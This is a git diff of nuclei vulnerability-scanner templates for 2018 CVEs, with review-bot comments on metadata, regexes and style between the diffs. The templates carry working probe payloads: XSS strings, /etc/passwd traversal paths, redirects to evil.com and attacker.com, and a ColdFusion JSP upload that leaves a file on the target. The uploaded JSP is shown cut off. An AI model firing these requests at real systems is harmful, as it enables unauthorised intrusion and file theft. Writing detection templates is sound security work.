diff --git a/nuclei-templates/CVE-2018/CVE-2018-1000856.yaml b/nuclei-templates/CVE-2018/cve-2018-1000856.yaml similarity index 100% rename from nuclei-templates/CVE-2018/CVE-2018-1000856.yaml rename to nuclei-templates/CVE-2018/cve-2018-1000856.yaml diff --git a/nuclei-templates/CVE-2018/cve-2018-10230.yaml b/nuclei-templates/CVE-2018/cve-2018-10230.yaml index 9d1ac7b5e4..feadcb357a 100644 --- a/nuclei-templates/CVE-2018/cve-2018-10230.yaml +++ b/nuclei-templates/CVE-2018/cve-2018-10230.yaml @@ -6,6 +6,10 @@ info: severity: medium description: | Zend Server before version 9.13 is vulnerable to cross-site scripting via the debug_host parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary scripts in the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. + remediation: | + Upgrade Zend Server to version 9.13 or later to mitigate this vulnerability. reference: - https://www.synacktiv.com/ressources/zend_server_9_1_3_xss.pdf - https://www.zend.com/en/products/server/release-notes @@ -15,9 +19,16 @@ info: cvss-score: 6.1 cve-id: CVE-2018-10230 cwe-id: CWE-79 + epss-score: 0.00122 + epss-percentile: 0.46318 + cpe: cpe:2.3:a:zend:zend_server:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: zend + product: zend_server tags: cve,cve2018,xss,zend -requests: +http: - method: GET path: - "{{BaseURL}}/index.php?debug_host=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&start_debug=1" @@ -39,5 +50,4 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/08/18 +# digest: 490a0046304402201423fd900a1cd2dcf52028722c5f7a43f8b6d20d5a5b65d58f59ffed42a8f6ff02205da25d220a25b5faef2f03778f2b749c7a385c901429baf839f1815fc1681d28:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2018/cve-2018-10956.yaml b/nuclei-templates/CVE-2018/cve-2018-10956.yaml index 1cde241ed5..a509b9736d 100644 
--- a/nuclei-templates/CVE-2018/cve-2018-10956.yaml +++ b/nuclei-templates/CVE-2018/cve-2018-10956.yaml @@ -1,23 +1,37 @@ id: CVE-2018-10956 + info: - name: IPConfigure Orchid Core VMS 2.0.5 - Unauthenticated Directory Traversal. + name: IPConfigure Orchid Core VMS 2.0.5 - Local File Inclusion author: 0x_Akoko severity: high - description: IPConfigure Orchid Core VMS 2.0.5 allows Directory Traversal. + description: | + IPConfigure Orchid Core VMS 2.0.5 is susceptible to local file inclusion. + impact: | + An attacker can exploit this vulnerability to gain unauthorized access to sensitive information, potentially leading to further compromise of the system. + remediation: | + Update to the latest version of IPConfigure Orchid Core VMS to mitigate the LFI vulnerability. reference: - https://labs.nettitude.com/blog/cve-2018-10956-unauthenticated-privileged-directory-traversal-in-ipconfigure-orchid-core-vms/ - https://github.com/nettitude/metasploit-modules/blob/master/orchid_core_vms_directory_traversal.rb - - https://www.cvedetails.com/cve/CVE-2018-10956 + - https://www.exploit-db.com/exploits/44916/ + - https://nvd.nist.gov/vuln/detail/CVE-2018-10956 + - https://github.com/xbl3/awesome-cve-poc_qazbnm456 classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2018-10956 cwe-id: CWE-22 + epss-score: 0.57917 + epss-percentile: 0.97652 + cpe: cpe:2.3:a:ipconfigure:orchid_core_vms:2.0.5:*:*:*:*:*:*:* metadata: + max-request: 1 + vendor: ipconfigure + product: orchid_core_vms shodan-query: http.title:"Orchid Core VMS" - tags: cve,cve2018,orchid,vms,lfi + tags: cve2018,cve,orchid,vms,lfi,edb,ipconfigure -requests: +http: - method: GET path: - "{{BaseURL}}/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e/etc/passwd" 
@@ -31,3 +45,4 @@ requests: - type: status status: - 200 +# digest: 4b0a00483046022100f4b3ba62ada360ed542a1dc3aeb23fe810a3516b33b87653ac8cc1e848028c5b0221009dcb0edfc90ad78d55ad83bcfc106071329ffdb8ca67a671481c79a10b2a61cc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2018/CVE-2018-11510.yaml b/nuclei-templates/CVE-2018/cve-2018-11510.yaml similarity index 100% rename from nuclei-templates/CVE-2018/CVE-2018-11510.yaml rename to nuclei-templates/CVE-2018/cve-2018-11510.yaml diff --git a/nuclei-templates/CVE-2018/cve-2018-11709.yaml b/nuclei-templates/CVE-2018/cve-2018-11709.yaml new file mode 100644 index 0000000000..a5c31e20e5 --- /dev/null +++ b/nuclei-templates/CVE-2018/cve-2018-11709.yaml @@ -0,0 +1,35 @@ +id: CVE-2018-11709 + +info: + name: wpForo Forum <= 1.4.11 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + description: wpforo_get_request_uri in wpf-includes/functions.php in the wpForo Forum plugin before 1.4.12 for WordPress allows Unauthenticated Reflected Cross-Site Scripting (XSS) via the URI. + reference: https://nvd.nist.gov/vuln/detail/CVE-2018-11709 + tags: cve,cve2018,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2018-11709 + cwe-id: CWE-79 + +requests: + - method: GET + path: + - '{{BaseURL}}/index.php/community/?%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2018/CVE-2018-11759.yaml b/nuclei-templates/CVE-2018/cve-2018-11759.yaml similarity index 100% rename from nuclei-templates/CVE-2018/CVE-2018-11759.yaml rename to nuclei-templates/CVE-2018/cve-2018-11759.yaml 
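Review bot: In the new cve-2018-11709 template the body matcher's word is rendered here as the empty string `""`; if that is what the file contains, an empty needle matches every response and, combined with the `text/html` and 200 checks, every wpForo community page would be flagged. If the payload was merely stripped in this view, confirm the file actually holds `- "<script>alert(document.domain)</script>"`, the decoded form of the query string in the request path. Separately, the file is added as lower-case `cve-2018-11709.yaml` while the same patch renames sibling templates to `CVE-…`, and `cvss-score: 6.10` plus the scalar `reference:` follow the older conventions; align them with the other templates touched here.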
diff --git a/nuclei-templates/CVE-2018/CVE-2018-12031.yaml b/nuclei-templates/CVE-2018/cve-2018-12031.yaml similarity index 100% rename from nuclei-templates/CVE-2018/CVE-2018-12031.yaml rename to nuclei-templates/CVE-2018/cve-2018-12031.yaml diff --git a/nuclei-templates/CVE-2018/cve-2018-12300.yaml b/nuclei-templates/CVE-2018/cve-2018-12300.yaml deleted file mode 100644 index aac189bfd8..0000000000 --- a/nuclei-templates/CVE-2018/cve-2018-12300.yaml +++ /dev/null @@ -1,28 +0,0 @@ -id: CVE-2018-12300 - -info: - name: Seagate NAS OS 4.3.15.1 - Open redirect - author: 0x_Akoko - severity: medium - description: Arbitrary Redirect in echo-server.html in Seagate NAS OS version 4.3.15.1 allows attackers to disclose information in the Referer header via the 'state' URL parameter. - reference: - - https://blog.securityevaluators.com/invading-your-personal-cloud-ise-labs-exploits-the-seagate-stcr3000101-ecf89de2170 - - https://www.cvedetails.com/cve/CVE-2018-12300 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 - cve-id: CVE-2018-12300 - cwe-id: CWE-601 - tags: cve,cve2018,redirect,seagate,nasos - -requests: - - method: GET - - path: - - '{{BaseURL}}/echo-server.html?code=test&state=http://www.attacker.com#' - - matchers: - - type: regex - part: header - regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)attacker\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 diff --git a/nuclei-templates/CVE-2018/cve-2018-1247.yaml b/nuclei-templates/CVE-2018/cve-2018-1247.yaml index e522302ccb..4d0cf1ab7e 100644 --- a/nuclei-templates/CVE-2018/cve-2018-1247.yaml +++ b/nuclei-templates/CVE-2018/cve-2018-1247.yaml @@ -4,6 +4,7 @@ info: name: RSA Authentication Manager XSS author: madrobot severity: medium + tags: cve,cve2018,xss,flash requests: - method: GET 
diff --git a/nuclei-templates/CVE-2018/CVE-2018-12613.yaml b/nuclei-templates/CVE-2018/cve-2018-12613.yaml similarity index 100% rename from nuclei-templates/CVE-2018/CVE-2018-12613.yaml rename to nuclei-templates/CVE-2018/cve-2018-12613.yaml diff --git a/nuclei-templates/CVE-2018/cve-2018-12675.yaml b/nuclei-templates/CVE-2018/cve-2018-12675.yaml deleted file mode 100644 index d1f5d24b6f..0000000000 --- a/nuclei-templates/CVE-2018/cve-2018-12675.yaml +++ /dev/null @@ -1,34 +0,0 @@ -id: CVE-2018-12675 - -info: - name: SV3C HD Camera L Series - Open Redirect - author: 0x_Akoko - severity: medium - description: | - SV3C HD Camera L Series 2.3.4.2103-S50-NTD-B20170508B and 2.3.4.2103-S50-NTD-B20170823B contains an open redirect vulnerability. It does not perform origin checks on URLs in the camera's web interface, which can be leveraged to send a user to an unexpected endpoint. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized operations. - reference: - - https://bishopfox.com/blog/sv3c-l-series-hd-camera-advisory - - https://vuldb.com/?id.125799 - - https://www.bishopfox.com/news/2018/10/sv3c-l-series-hd-camera-multiple-vulnerabilities/ - - https://nvd.nist.gov/vuln/detail/CVE-2018-12675 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2018-12675 - cwe-id: CWE-601 - metadata: - verified: "true" - tags: cve,cve2018,redirect,sv3c,camera,iot - -requests: - - method: GET - path: - - '{{BaseURL}}/web/cgi-bin/hi3510/param.cgi?cmd=setmobilesnapattr&cururl=http%3A%2F%2Finteract.sh' - - matchers: - - type: word - part: body - words: - - '' - -# Enhanced by md on 2022/10/13 diff --git a/nuclei-templates/CVE-2018/CVE-2018-1273.yaml b/nuclei-templates/CVE-2018/cve-2018-1273.yaml similarity index 100% rename from nuclei-templates/CVE-2018/CVE-2018-1273.yaml rename to nuclei-templates/CVE-2018/cve-2018-1273.yaml 
diff --git a/nuclei-templates/CVE-2018/CVE-2018-1335.yaml b/nuclei-templates/CVE-2018/cve-2018-1335.yaml similarity index 100% rename from nuclei-templates/CVE-2018/CVE-2018-1335.yaml rename to nuclei-templates/CVE-2018/cve-2018-1335.yaml diff --git a/nuclei-templates/CVE-2018/cve-2018-13980.yaml b/nuclei-templates/CVE-2018/cve-2018-13980.yaml new file mode 100644 index 0000000000..3f6afd77f7 --- /dev/null +++ b/nuclei-templates/CVE-2018/cve-2018-13980.yaml @@ -0,0 +1,32 @@ +id: CVE-2018-13980 + +info: + name: Zeta Producer Desktop CMS 14.2.0 - Local File Disclosure + author: wisnupramoedya + severity: medium + description: The websites that were built from Zeta Producer Desktop CMS before 14.2.1 are vulnerable to unauthenticated file disclosure if the plugin "filebrowser" is installed, because of assets/php/filebrowser/filebrowser.main.php?file=../ directory traversal. + reference: + - https://www.exploit-db.com/exploits/45016 + - https://nvd.nist.gov/vuln/detail/CVE-2018-13980 + tags: cve,cve2018,lfi + classification: + cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N + cvss-score: 5.50 + cve-id: CVE-2018-13980 + cwe-id: CWE-22 + +requests: + - method: GET + path: + - "{{BaseURL}}/assets/php/filebrowser/filebrowser.main.php?file=../../../../../../../../../../etc/passwd&do=download" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2018/cve-2018-14064.yaml b/nuclei-templates/CVE-2018/cve-2018-14064.yaml new file mode 100644 index 0000000000..f3452b953f --- /dev/null +++ b/nuclei-templates/CVE-2018/cve-2018-14064.yaml 
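Review bot: The classification added for cve-2018-13980 is `AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N` (5.50), yet the description and the request both describe an unauthenticated, network-reachable file read via `filebrowser.main.php?file=../`, which would be `AV:N/PR:N`. The vector may have been copied from the NVD record; if so, keep it but note the discrepancy in the description and consider whether `severity: medium` understates a remote unauthenticated read of `/etc/passwd`, since scanner triage keys off `severity`. Also write the score as `5.5` and place `tags` after `classification` to match the other templates in this patch.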
@@ -0,0 +1,33 @@
+id: CVE-2018-14064
+
+info:
+ name: VelotiSmart Wifi - Directory Traversal
+ author: 0x_Akoko
+ severity: critical
+ description: The uc-http service 1.0.0 on VelotiSmart WiFi B-380 camera devices allows Directory Traversal, as demonstrated by /../../etc/passwd on TCP port 80.
+ reference:
+ - https://medium.com/@s1kr10s/velotismart-0day-ca5056bcdcac
+ - https://www.exploit-db.com/exploits/45030
+ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14064
+ tags: cve,cve2018,lfi,camera,iot
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.80
+ cve-id: CVE-2018-14064
+ cwe-id: CWE-22
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/../../etc/passwd"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:[x*]:0:0"
+
+ - type: status
+ status:
+ - 200
diff --git a/nuclei-templates/CVE-2018/cve-2018-14574.yaml b/nuclei-templates/CVE-2018/cve-2018-14574.yaml
deleted file mode 100644
index 528e24f879..0000000000
--- a/nuclei-templates/CVE-2018/cve-2018-14574.yaml
+++ /dev/null
@@ -1,23 +0,0 @@
-id: cve-2018-14574
-
-info:
- name: Django Open Redirect
- author: pikpikcu
- severity: low
- tags: cve,cve2018,django,redirect
-
-requests:
- - method: GET
- path:
- - "{{BaseURL}}//www.example.com"
-
- matchers-condition: and
- matchers:
- - type: status
- status:
- - 301
- - type: word
- words:
- - "Location: https://www.example.com"
- - "Location: http://www.example.com"
- part: header
diff --git a/nuclei-templates/CVE-2018/cve-2018-14918.yaml b/nuclei-templates/CVE-2018/cve-2018-14918.yaml
deleted file mode 100644
index 4c75905015..0000000000
--- a/nuclei-templates/CVE-2018/cve-2018-14918.yaml
+++ /dev/null
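Review bot: The probe path `{{BaseURL}}/../../etc/passwd` in cve-2018-14064.yaml only tests what the description claims if the HTTP client sends the dot segments verbatim; if the client normalizes the path before sending, the request collapses to `/etc/passwd` and the template silently stops exercising the traversal. That assumption deserves a comment on the path line, e.g. `# dot segments must reach the server un-normalized; confirm the client does not clean the path`, and a raw request if normalization is observed in practice. The regex `root:[x*]:0:0` is also narrower than the `root:.*:0:0` form cve-2018-13980 uses in this same commit; the two templates should agree on one form.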
@@ -1,39 +0,0 @@ -id: CVE-2018-14918 - -info: - name: LOYTEC LGATE-902 6.3.2 - Local File Inclusion - author: 0x_Akoko - severity: high - description: | - LOYTEC LGATE-902 6.3.2 is susceptible to local file inclusion which could allow an attacker to manipulate path references and access files and directories (including critical system files) that are stored outside the root folder of the web application running on the device. This can be used to read and configuration files containing, e.g., usernames and passwords. - reference: - - https://seclists.org/fulldisclosure/2019/Apr/12 - - http://packetstormsecurity.com/files/152453/Loytec-LGATE-902-XSS-Traversal-File-Deletion.html - - https://nvd.nist.gov/vuln/detail/CVE-2018-14918 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2018-14918 - cwe-id: CWE-22 - metadata: - shodan-query: http.html:"LGATE-902" - verified: "true" - tags: loytec,lfi,seclists,packetstorm,cve,cve2018,lgate - -requests: - - method: GET - path: - - "{{BaseURL}}/webui/file_guest?path=/var/www/documentation/../../../../../etc/passwd&flags=1152" - - matchers-condition: and - matchers: - - type: regex - part: body - regex: - - "root:.*:0:0:" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/07/07 diff --git a/nuclei-templates/CVE-2018/cve-2018-15138.yaml b/nuclei-templates/CVE-2018/cve-2018-15138.yaml new file mode 100644 index 0000000000..7548517b7e --- /dev/null +++ b/nuclei-templates/CVE-2018/cve-2018-15138.yaml 
@@ -0,0 +1,32 @@
+id: CVE-2018-15138
+info:
+ name: LG-Ericsson iPECS NMS 30M Directory Traversal
+ author: 0x_Akoko
+ severity: high
+ description: Ericsson-LG iPECS NMS 30M allows directory traversal via ipecs-cm/download?filename=../ URIs.
+ reference:
+ - https://cxsecurity.com/issue/WLB-2018080070
+ - https://nvd.nist.gov/vuln/detail/CVE-2018-15138
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.5
+ cve-id: CVE-2018-15138
+ cwe-id: CWE-22
+ tags: cve,cve2018,ericsson,lfi,traversal
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/ipecs-cm/download?filename=../../../../../../../../../../etc/passwd&filepath=/home/wms/www/data"
+ - "{{BaseURL}}/ipecs-cm/download?filename=jre-6u13-windows-i586-p.exe&filepath=../../../../../../../../../../etc/passwd%00.jpg"
+
+ stop-at-first-match: true
+ matchers-condition: and
+ matchers:
+ - type: regex
+ regex:
+ - "root:[x*]:0:0"
+
+ - type: status
+ status:
+ - 200
diff --git a/nuclei-templates/CVE-2018/cve-2018-15961.yaml b/nuclei-templates/CVE-2018/cve-2018-15961.yaml
new file mode 100644
index 0000000000..fc6dc72993
--- /dev/null
+++ b/nuclei-templates/CVE-2018/cve-2018-15961.yaml
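Review bot: The header of cve-2018-15138.yaml departs from the layout every other template in this commit follows: there is no blank line between `id:` and `info:`, and the name `LG-Ericsson iPECS NMS 30M Directory Traversal` omits the ` - ` separator between product and vulnerability class that the other names use (compare `DotCMS < 5.0.2 - Open Redirect`). Suggest `name: LG-Ericsson iPECS NMS 30M - Directory Traversal`. It also keeps the `requests:` key and lacks `metadata.max-request` (2 here, since two paths are sent), which the reworked templates in this commit carry.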
@@ -0,0 +1,65 @@ +id: CVE-2018-15961 + +info: + name: Adobe ColdFusion Unrestricted File Upload RCE + author: SkyLark-Lab,ImNightmaree + severity: critical + description: Adobe ColdFusion versions July 12 release (2018.0.0.310739), Update 6 and earlier, and Update 14 and earlier have an unrestricted file upload vulnerability. Successful exploitation could lead to arbitrary code execution. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2018-15961 + - https://github.com/xbufu/CVE-2018-15961 + tags: cve,cve2018,adobe,rce,coldfusion,fileupload + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2018-15961 + cwe-id: CWE-434 + +requests: + - raw: + - | + POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=---------------------------24464570528145 + + -----------------------------24464570528145 + Content-Disposition: form-data; name="file"; filename="{{randstr}}.jsp" + Content-Type: image/jpeg + + <%@ page import="java.util.*,java.io.*"%> + <%@ page import="java.security.MessageDigest"%> + <% + String cve = "CVE-2018-15961"; + MessageDigest alg = MessageDigest.getInstance("MD5"); + alg.reset(); + alg.update(cve.getBytes()); + byte[] digest = alg.digest(); + StringBuffer hashedpasswd = new StringBuffer(); + String hx; + for (int i=0;i + -----------------------------24464570528145 + Content-Disposition: form-data; name="path" + + {{randstr}}.jsp + -----------------------------24464570528145-- + + - | + GET /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/{{randstr}}.jsp HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + + - type: word + words: + - "ddbb3e76f92e78c445c8ecb392beb225" # MD5 of CVE-2018-15961 + + - type: status + status: + - 200 
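Review bot: cve-2018-15961.yaml uploads a `{{randstr}}.jsp` file into `uploadedFiles/` on the scanned ColdFusion host and never removes it, so every host that accepts the upload — including those where the second request fails to match — is left with a server-side executable artifact. That should be stated in the template and reflected in `tags` (an `intrusive` tag) so operators can exclude it from routine scans; suggest `# NOTE: leaves {{randstr}}.jsp in uploadedFiles/ on the target; no cleanup request is sent` above the `raw:` block. Separately, the embedded JSP body appears cut off in this view (`for (int i=0;i` ends mid-statement while the hunk header announces 65 lines), so either the page lost content or the template is malformed; confirm the committed file parses before merging.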
diff --git a/nuclei-templates/CVE-2018/cve-2018-16341.yaml b/nuclei-templates/CVE-2018/cve-2018-16341.yaml index ab875f5b52..eac56aef00 100644 --- a/nuclei-templates/CVE-2018/cve-2018-16341.yaml +++ b/nuclei-templates/CVE-2018/cve-2018-16341.yaml @@ -1,10 +1,12 @@ -id: cve-2018-16341 +id: CVE-2018-16341 + info: name: Nuxeo Authentication Bypass Remote Code Execution author: madrobot severity: high description: Nuxeo Authentication Bypass Remote Code Execution < 10.3 using a SSTI - tags: cve,cve2018,nuxeo,ssti,rce + tags: cve,cve2018,nuxeo,ssti,rce,bypass + requests: - method: GET path: diff --git a/nuclei-templates/CVE-2018/CVE-2018-16671.yaml b/nuclei-templates/CVE-2018/cve-2018-16671.yaml similarity index 100% rename from nuclei-templates/CVE-2018/CVE-2018-16671.yaml rename to nuclei-templates/CVE-2018/cve-2018-16671.yaml diff --git a/nuclei-templates/CVE-2018/CVE-2018-16716.yaml b/nuclei-templates/CVE-2018/cve-2018-16716.yaml similarity index 100% rename from nuclei-templates/CVE-2018/CVE-2018-16716.yaml rename to nuclei-templates/CVE-2018/cve-2018-16716.yaml diff --git a/nuclei-templates/CVE-2018/cve-2018-16761.yaml b/nuclei-templates/CVE-2018/cve-2018-16761.yaml index 7f0883240e..23f9df48fa 100644 --- a/nuclei-templates/CVE-2018/cve-2018-16761.yaml +++ b/nuclei-templates/CVE-2018/cve-2018-16761.yaml 
@@ -6,6 +6,10 @@ info: severity: medium description: | Eventum before 3.4.0 contains an open redirect vulnerability. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the theft of sensitive information. + remediation: | + Upgrade to Eventum version 3.4.0 or later to fix the open redirect vulnerability. reference: - https://www.invicti.com/web-applications-advisories/ns-18-021-open-redirection-vulnerabilities-in-eventum/ - https://github.com/eventum/eventum/releases/tag/v3.4.0 @@ -15,9 +19,16 @@ info: cvss-score: 6.1 cve-id: CVE-2018-16761 cwe-id: CWE-601 - tags: cve,cve2018,redirect,eventum,oss + epss-score: 0.00068 + epss-percentile: 0.28116 + cpe: cpe:2.3:a:eventum_project:eventum:*:*:*:*:*:*:*:* + metadata: + max-request: 2 + vendor: eventum_project + product: eventum + tags: cve,cve2018,redirect,eventum,oss,eventum_project -requests: +http: - method: GET path: - '{{BaseURL}}/select_project.php?url=http://interact.sh' @@ -28,6 +39,5 @@ requests: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 - -# Enhanced by md on 2022/10/13 + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 +# digest: 4b0a00483046022100e1983ab57aad7d2f22f2ba0dea11509f38177f73e307a187c6b61e4dd913d631022100b3efb8776bfa1c1caa13f75f339008475a607f5169e8984cd452e62791d91515:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2018/cve-2018-16836.yaml b/nuclei-templates/CVE-2018/cve-2018-16836.yaml index b9f77b86e3..0a8102bf1d 100644 --- a/nuclei-templates/CVE-2018/cve-2018-16836.yaml 
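Review bot: The change to the Location regex in the third hunk (`@@ -28,6 +39,5 @@`) drops the `?` after the scheme group, so a `Location:` value without a scheme or `//` prefix no longer matches; that is a deliberate tightening (a bare `interact.sh/...` is a same-origin path, not an external redirect), but nothing in the file says so, and the next editor comparing it with the regex101 link may revert it. A short comment on that line would preserve the intent: `# scheme or protocol-relative prefix is required: a bare host is a relative path, not an open redirect`. The `max-request: 2` added in the second hunk should also be checked against the full `path:` list, which continues past the end of that hunk.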
+++ b/nuclei-templates/CVE-2018/cve-2018-16836.yaml @@ -1,19 +1,29 @@ -id: rubedo-cms-directory-traversal +id: CVE-2018-16836 + info: name: Rubedo CMS 3.4.0 - Directory Traversal author: 0x_Akoko - severity: high + severity: critical reference: https://www.exploit-db.com/exploits/45385 - tags: rubedo,lfi + tags: cve,cve2018,rubedo,lfi + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2018-16836 + cwe-id: CWE-22 + description: "Rubedo through 3.4.0 contains a Directory Traversal vulnerability in the theme component, allowing unauthenticated attackers to read and execute arbitrary files outside of the service root path, as demonstrated by a /theme/default/img/%2e%2e/..//etc/passwd URI." + requests: - method: GET path: - "{{BaseURL}}/theme/default/img/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e//etc/passwd" + matchers-condition: and matchers: - type: regex regex: - - "root:[x*]:0:0" + - "root:.*:0:0" + - type: status status: - 200 diff --git a/nuclei-templates/CVE-2018/cve-2018-17422.yaml b/nuclei-templates/CVE-2018/cve-2018-17422.yaml new file mode 100644 index 0000000000..28743e3369 --- /dev/null +++ b/nuclei-templates/CVE-2018/cve-2018-17422.yaml 
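Review bot: `reference:` in cve-2018-16836.yaml is still a bare scalar (`reference: https://www.exploit-db.com/exploits/45385`) while every other template in this commit uses a list and carries the NVD link; since the same hunk adds `cve-id`, the NVD entry is the natural second reference. Suggest `reference:` / `  - https://www.exploit-db.com/exploits/45385` / `  - https://nvd.nist.gov/vuln/detail/CVE-2018-16836`. The hunk also raises severity to critical with `C:H/I:H/A:H` for what the new description describes as reading files; confirm that vector against the NVD entry rather than carrying it forward unexamined.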
@@ -0,0 +1,46 @@
+id: CVE-2018-17422
+
+info:
+ name: DotCMS < 5.0.2 - Open Redirect
+ author: 0x_Akoko,daffainfo
+ severity: medium
+ description: |
+ dotCMS before 5.0.2 contains multiple open redirect vulnerabilities via the html/common/forward_js.jsp FORWARD_URL parameter or the html/portlet/ext/common/page_preview_popup.jsp hostname parameter. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
+ impact: |
+ An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the installation of malware.
+ remediation: |
+ Upgrade to a version of DotCMS that is higher than 5.0.2 to mitigate the open redirect vulnerability.
+ reference:
+ - https://github.com/dotCMS/core/issues/15286
+ - https://nvd.nist.gov/vuln/detail/CVE-2018-17422
+ - https://github.com/ARPSyndicate/kenzer-templates
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2018-17422
+ cwe-id: CWE-601
+ epss-score: 0.00118
+ epss-percentile: 0.44971
+ cpe: cpe:2.3:a:dotcms:dotcms:*:*:*:*:*:*:*:*
+ metadata:
+ verified: true
+ max-request: 2
+ vendor: dotcms
+ product: dotcms
+ shodan-query: http.title:"dotCMS"
+ tags: cve2018,cve,redirect,dotcms
+
+http:
+ - method: GET
+ path:
+ - '{{BaseURL}}/html/common/forward_js.jsp?FORWARD_URL=http://evil.com'
+ - '{{BaseURL}}/html/portlet/ext/common/page_preview_popup.jsp?hostname=evil.com'
+
+ stop-at-first-match: true
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "self.location = 'http://evil.com'"
+ - "location.href = 'http\\x3a\\x2f\\x2fwww\\x2eevil\\x2ecom'"
+# digest: 4b0a00483046022100b9ccd68c61702e8993ac90e5736b80c6f0becb6042c2e5985e4b08b0996a1e950221009c6e50a671ce1798b130f6fccf18aed8ddd2548fda94175c2bca18ff2f949a6d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
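Review bot: Both probe URLs in cve-2018-17422.yaml point the target's redirect at the real third-party domain `evil.com`, and the matcher looks for that literal in the body, so any browser or crawler that follows the scanned app's redirect is sent to a domain nobody involved controls. The eventum template in this same commit (cve-2018-16761) uses `interact.sh` for the same purpose, and the `{{interactsh-url}}` variable would let nuclei observe the redirect target itself; at minimum the two templates should agree on a destination. Also, the second expected string contains `www\\x2eevil\\x2ecom` although the request sent `hostname=evil.com`; if the application prepends `www.` that deserves a comment on the line, otherwise the second word can never match and `stop-at-first-match` hides it.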
diff --git a/nuclei-templates/CVE-2018/cve-2018-18069.yaml b/nuclei-templates/CVE-2018/cve-2018-18069.yaml
new file mode 100644
index 0000000000..2f61102505
--- /dev/null
+++ b/nuclei-templates/CVE-2018/cve-2018-18069.yaml
@@ -0,0 +1,27 @@
+id: CVE-2018-18069
+
+info:
+ name: Wordpress unauthenticated stored xss
+ author: nadino
+ severity: medium
+ description: process_forms in the WPML (aka sitepress-multilingual-cms) plugin through 3.6.3 for WordPress has XSS via any locale_file_name_ parameter (such as locale_file_name_en) in an authenticated theme-localization.php request to wp-admin/admin.php.
+ tags: cve,cve2018,wordpress,xss,plugin
+ classification:
